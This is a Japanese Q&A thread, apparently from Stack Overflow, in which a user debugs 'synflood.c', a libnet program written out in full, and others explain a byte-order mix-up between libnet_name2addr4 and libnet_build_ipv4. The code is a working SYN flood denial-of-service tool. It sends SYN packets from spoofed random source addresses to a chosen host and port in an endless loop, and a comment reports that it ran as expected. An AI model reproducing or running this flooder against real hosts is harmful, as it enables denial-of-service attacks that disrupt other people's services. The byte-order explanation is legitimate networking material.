# libnetのipアドレスについて

Tags: c

[libnetで作成したデータについて](https://ja.stackoverflow.com/q/67144/19110) で回答をいただいた後、試してみた結果、ipアドレスがうまく通っていないようです。（異なるipアドレスで実行し、tcpdumpでかくにんした所、どちらのipアドレスも、「76.137.233.137」が宛先となってしまいます。）
この「76.137.233.137」というアドレスは、一体何でしょうか？
また、以下のコードを付け加えた結果、以下のようになりました。「402000a」は、「10.0.2.4」のネットワークアドレスで問題ないでしょうか？

```
sudo ./synflood 10.0.2.4 7890
argv[1]: 10.0.2.4
argv[2]: -2005821230
dest_ip: 402000a
dest_port: 7890
SYN Flooding port 7890 of 10.0.2.4..
```

synflood.c

```
#include <string.h>
#include <netinet/in.h>
#include <libnet.h>
#include <arpa/inet.h>

#define FLOOD_DELAY 5000        //パケット注入の遅延時間は5000msである。


/* x.x.x.x形式のIPを返す*/
char *print_ip(uint32_t *ip_addr_ptr){
        return inet_ntoa(*((struct in_addr *)ip_addr_ptr));
}

int main(int argc,char *argv[]){
        uint32_t dest_ip,source;
        uint16_t dest_port;
        u_char errbuf[LIBNET_ERRBUF_SIZE], *pcap_errbuf, *packet;
        int network, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
        libnet_t *l;


        if(argc<3){
                printf("使用方法:\n%s\t ＜対象ホスト＞＜対象ポート＞\n",argv[0]);
                exit(1);
        }

        //printf("device name: %s\n",alldevsp->name);
        l = libnet_init(LIBNET_RAW4,"eth0",errbuf);             //パケット酔うのメモリを割り当てる
        if(l == NULL){
                fprintf(stderr,"Error opening context: %s\n",errbuf);
                exit(1);
        }

        **printf("argv[1]: %s\n",argv[1]);
        printf("argv[2]: %d\n",argv[2]);**

        dest_ip = libnet_name2addr4(l,argv[1],LIBNET_DONT_RESOLVE);     //host
        dest_port = (u_short)atoi(argv[2]);                     //ポート

        **printf("dest_ip: %x\n",dest_ip);
        printf("dest_port: %d\n",dest_port);**

        if(libnet_seed_prand(l) == -1)                                  //乱数生成器に種を与える
                printf("Error libnet_seed_prand: %s\n",libnet_geterror(l));


        printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));

        libnet_ptag_t tag_ipv4 = 0;                             //libnet protocol block
        libnet_ptag_t tag_tcp = 0;                              //libnet protocol block

        while(1){                                               //永久ループ（CTRL-Cで終了されるまで）
                if(tag_tcp = libnet_build_tcp(libnet_get_prand(LIBNET_PRu16),  //送信元TCPポート（乱数化）
                        dest_port,                              //宛先TCPポート
                        libnet_get_prand(LIBNET_PRu32),         //シーケンス番号（乱数化）
                        libnet_get_prand(LIBNET_PRu32),         //確認応答（ACK)番号（乱数化）
                        TH_SYN,                                 //コントロールフラグ(SYNフラグのみ設定）
                        libnet_get_prand(LIBNET_PRu16),         //ウィンドウサイズ（乱数化）
                        0,                                      //checksum 0=autofill
                        0,                                      //至急ポインタ
                        LIBNET_TCP_H,                           //header length
                        NULL,                                   //ペイロード（なし）
                        0,                                      //ペイロード長
                        l,                                      //libnet context
                        0) == -1)                               //protocol tag
                        printf("Error building TCP header; %s\n",libnet_geterror(l));

                if(tag_ipv4 = libnet_build_ipv4(packet_size,            //IPヘッダを除いたパケットサイズ
                        IPTOS_LOWDELAY,                         //IP　tos
                        libnet_get_prand(LIBNET_PRu16),         //IP ID(乱数化)
                        0,                                      //断片化
                        libnet_get_prand(LIBNET_PR8),           //TTL（乱数化）
                        IPPROTO_TCP,                            //トランスポートプロトコル
                        0,                                      //checksum 0=autofill
                        libnet_get_prand(LIBNET_PRu32),         //送信元IP（乱数化)
                        dest_ip,                                //宛先IP(little endian)
                        NULL,                                   //ペイロード（なし）
                        0,                                      //ペイロード長
                        l,                                      //libnet context
                        0) == -1)                               //protocol tag
                        printf("Error building IP header; %s\n",libnet_geterror(l));



                if(libnet_write_raw_ipv4(l,packet,40) == -1){
                        printf("@Erro libnet_write: %s\n",libnet_geterror(l));
                        exit(1);
                }


                usleep(FLOOD_DELAY);                            //FLOOD_DEPLAYミリ秒待機する
        }

        libnet_destroy(l);                              //パケットメモリを開放する


        return 0;
}
```

Comment: ```linnet_name2addr4()```から```libnet_build_ipv4()```へのipアドレスの受渡しは、```ntohl()``などによる変換は、必要なかったです。l```innet_name2addr4()```で返ってくるバイトオーダのデータが、システム環境に従い、メモリへ保存されるということかと思います。（←確認していないですが。。。）使っているシステムが、kaliでlittle endianなので、変換が必要なかったのだろうと思います。試しに確認した方いれば、教えてください。

Comment: synflood.cは、期待どおり、動きました。解決方法は、「libnetで作成したデータについて」に示しました。

Answer (score 1):

`libnet_name2addr4`関数が返却する値(IPv4アドレス)は「ネットワークオーダ」、`libnet_build_ipv4`関数の引数で要求されるIPv4アドレスは「little endian」とのことなので、バイトオーダが逆転しているように見受けます。

＃デバッグ出力は「a000204」にならないといけないようです。

そのため意図しないIPアドレスにパケットを送信しているように見えます。

#### `libnet_name2addr4`関数の説明。(ヘッダファイルより抜粋)

`@return`の説明に「ネットワークオーダ」と記載あり。

```
/**
 * Takes a dotted decimal string or a canonical DNS name and returns a 
 * network byte ordered IPv4 address. This may incur a DNS lookup if mode is
 * set to LIBNET_RESOLVE and host_name refers to a canonical DNS name. If mode
 * is set to LIBNET_DONT_RESOLVE no DNS lookup will occur. The function can
 * fail if DNS lookup fails or if mode is set to LIBNET_DONT_RESOLVE and
 * host_name refers to a canonical DNS name.
 * @param l pointer to a libnet context
 * @param host_name pointer to a string containing a presentation format host
 * name
 * @param use_name LIBNET_RESOLVE or LIBNET_DONT_RESOLVE
 * @return address in network byte order
 * @retval -1 (2^32 - 1) on error 
 */
LIBNET_API
uint32_t
libnet_name2addr4(libnet_t *l, const char *host_name, uint8_t use_name);
```

#### `libnet_build_ipv4`関数の説明。(ヘッダファイルより抜粋)

`@param dst`に「little endian」と記載あり。

```
/**
 * Builds a version 4 RFC 791 Internet Protocol (IP) header.
 *
 * @param ip_len total length of the IP packet including all subsequent data (subsequent
 *   data includes any IP options and IP options padding)
 * @param tos type of service bits
 * @param id IP identification number
 * @param frag fragmentation bits and offset
 * @param ttl time to live in the network
 * @param prot upper layer protocol
 * @param sum checksum (0 for libnet to auto-fill)
 * @param src source IPv4 address (little endian)
 * @param dst destination IPv4 address (little endian)
 * @param payload optional payload or NULL
 * @param payload_s payload length or 0
 * @param l pointer to a libnet context
 * @param ptag protocol tag to modify an existing header, 0 to build a new one
 * @return protocol tag value on success
 * @retval -1 on error
 */
LIBNET_API
libnet_ptag_t 
libnet_build_ipv4(uint16_t ip_len, uint8_t tos, uint16_t id, uint16_t frag,
uint8_t ttl, uint8_t prot, uint16_t sum, uint32_t src, uint32_t dst,
const uint8_t* payload, uint32_t payload_s, libnet_t *l, libnet_ptag_t ptag);
```

＊

ですので、`libnet_name2addr4`関数の返り値を「little endian」に変換すればよいと思います。
変換方法はいろいろあると思いますが、代表的なのは「[`ntohl`](https://linuxjm.osdn.jp/html/LDP_man-pages/man3/byteorder.3.html)」と思います。

```
/* 使用例 */
dst = ntohl(dst);
```

＃Kali Linux環境ということで、ホストオーダがLittle endianと想定しています。

Comment: 以前の質問とは別内容でしたので、こちらの質問にも回答しました。

Comment: ○試しに上記の変換を行って、試してみましたが、結果は同じで、tcpdumpの結果は、前回と同じ宛先アドレスになります。NAT環境に問題があるのでしょうか？それと「10.0.2.4」のリトルエンディアンは、やっぱり「402000a」では？もとい、「0402000a」なのでは？このあたり、何だか分からなくなってしまいました。

Comment: リトルエンディアン、理解できました。バイトオーダ、IPアドレスの表記法、１６進数など、知識がこんがらがっていました。tcpdumpの結果の詳細は、```07:05:23.406910 IP 220.0.0.0 > 76.137.233.137: ip-proto-77```の表示が並びます。```ip-proto-77```を調べたところ、「SUN ND PROTOCOL-Temporary」という表記にでくわし、行き詰まってしまいました。SUN NDとは、何でしょうか？

Comment: デパックのの結果は、```402000a```で問題ないと思います。これが、10.0.2.4のlittle endianかと思います。いろいろ調べてみた結果を上のコメントに記載しました。（どこに書けば良いかわからなかったので。）